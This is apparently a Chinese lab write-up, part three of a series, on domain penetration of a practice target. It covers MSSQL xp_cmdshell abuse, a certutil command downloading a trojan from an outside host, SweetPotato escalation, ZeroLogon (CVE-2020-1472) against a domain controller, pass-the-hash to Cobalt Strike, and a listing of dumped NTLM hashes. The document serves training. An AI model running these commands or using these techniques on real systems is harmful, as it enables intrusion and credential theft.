域渗透之外网打点到三层内网(三)

简介: 域渗透之外网打点到三层内网

6.mssqlclient 登录Mssql服务器

使用mysql用户和密码进行登录。

00fcc2cf059776e9b4f7a37d72ee951c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

7.xp_cmshell进行getshell

help查看可以执行那些命令。

36fd5cf313c7d20b03a02b8846075c4e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

开启xp_cmdshell,然后进行信息收集。

f240a925e594ba2f2ff86cf0b40831d9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用certutil远程下载之前的木马,然后进行上线


xp_cmdshell certutil -urlcache -split -f http://x.x.x.x/artifact.exe c:/windows/temp/artifact.exe

b3f78df958312e1aadbe846f4c8962d8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


8.使用SweetPotato (ms16-075)提权

上线之后,进行简单的信息收集。

2028b8ddb5213bda0aec7580e3f7733b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后使用第三方插件,利用SweetPotato (ms16-075)提权对其进行提权。

e1116d9b3f5460621e6bfd32d0bdc3f5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功提权。

4fa255d0eed1145161163e95e204173d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

内网域渗透

1.内网域信息收集

使用net view查看域内主机。

339058cbc46cbb22d17afc1e71ccb7d4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用hashdump进行抓取一些用户的hash值。

0da34dab9be5471f68b664efafdc4c67_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查看主机ip地址。

3f5b7fca87e76e777e423cb95bdfc25f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查看域控的Ip地址,和域控的计算机名。

edb9f0ac72ec0f575067c80ee4a8d591_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

b67f06d95ffafaf3a2424c7e3a75be93_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.ZeroLogon CVE-2020-1472 获取域控权限

编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。

fc3bd8a90d188388f4b587aac5cdfb58_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0

e87cf52fcbf4f8c96d3ff4f36b43ed1c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.配置代理,登录域控

配置kali的代理地址,然后进行端口扫描,测试代理是否连接。

b8aabe5f90102c10d6036b0ca1847dd0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

获取域控的hash值。

b8ff98fece55e53f4e23b109b247e3a9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::


然后进行登录域控。

8737f7d2a0e3a7849a1fdef80131d22d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4.PTH上线CS

关闭防火墙,利用pth进行上线cs。

94319008ee0c15d51926cbf852bc6e67_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功执行命令。

0b346cf221c3b8983045912a55119094_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

生成tcp监听,然后jump到域控主机。

de93354343a5af11a302ad3326fc5aaf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.恢复密码、原hash。

恢复密码。

23945abde2b45f0b4cd694f8010f0c1e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用 secretsdump.py获取其hash值。


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCA

8b5af01c220181e8d78d47a0297a36a4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


使用以下命令恢复域控密码。成功恢复其密码。


proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139 fb61e3c372e666adccb7a820aa39772f

1eaaf9566b9b3b2b4d53c6f4905dedc9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


靶机到这里就结束了。

aeac8435d5ef5bec5448af759e6da77a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

最后,成功拿下整个域控。

f8b07a7fc1526ae1b7e6afa41569c48a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总结:

该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xp_cmdshell进行getshell。在域渗透中使用CVE-2020-1472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。

相关文章
|
9月前
|
存储 安全 网络协议
《内网安全攻防》内网信息收集
《内网安全攻防》内网信息收集
63 0
|
SQL 安全 网络安全
域渗透之外网打点到三层内网(一)
域渗透之外网打点到三层内网
142 0
域渗透之外网打点到三层内网(一)
|
安全 Java 关系型数据库
域渗透之外网打点到三层内网(二)
域渗透之外网打点到三层内网
158 0
域渗透之外网打点到三层内网(二)
|
负载均衡 网络协议 算法
跨区域网络的通信学习静态路由
跨区域网络的通信学习静态路由
427 0
跨区域网络的通信学习静态路由
|
机器学习/深度学习 网络协议 网络架构
局域网设备与公网服务之间如何交互数据?
局域网设备与公网服务之间如何交互数据?
164 0
局域网设备与公网服务之间如何交互数据?
|
网络协议 安全 Shell
内网多级代理服务端工具 Stowaway
towaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具 用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能 PS:谢谢大家的star,同时欢迎大家使用后提出问题&&Bug 😘。
963 0
【计算机网络】网络层 : 移动 IP 技术 ( 移动节点 | 本地代理 | 外部代理 | 永久地址 | 转交地址 | 移动 IP 通信过程 )
【计算机网络】网络层 : 移动 IP 技术 ( 移动节点 | 本地代理 | 外部代理 | 永久地址 | 转交地址 | 移动 IP 通信过程 )
891 0
|
域名解析 存储 缓存
自上而下的理解网络(1)——DNS篇
现代生活中,网络可谓是无处不在,购物需要网络,付款需要网络,各种生活缴费需要网络,在各行各业的工作中,更是离不开网络。说到底,网络的作用无非是支持计算机间进行数据交换。世界各地有着不计其数的网络设备,这些网络设备是如何有序正常的进行数据交流的呢?网络以及各种协议的工作原理又是怎样的呢?本系列博客,我们将尝试自上而下的对网路的工作原理进行介绍,从应用层开始,逐层向下,详细的帮助你理解网络的核心工作原理。当然,网络协议多如牛毛,在网络分层中每一层的知识也是非常浩渺,希望这些博客可以起到抛砖引玉的作用,能够使你对于天天使用的互联网网络在宏观上有认识,在微观上也有了解。
453 0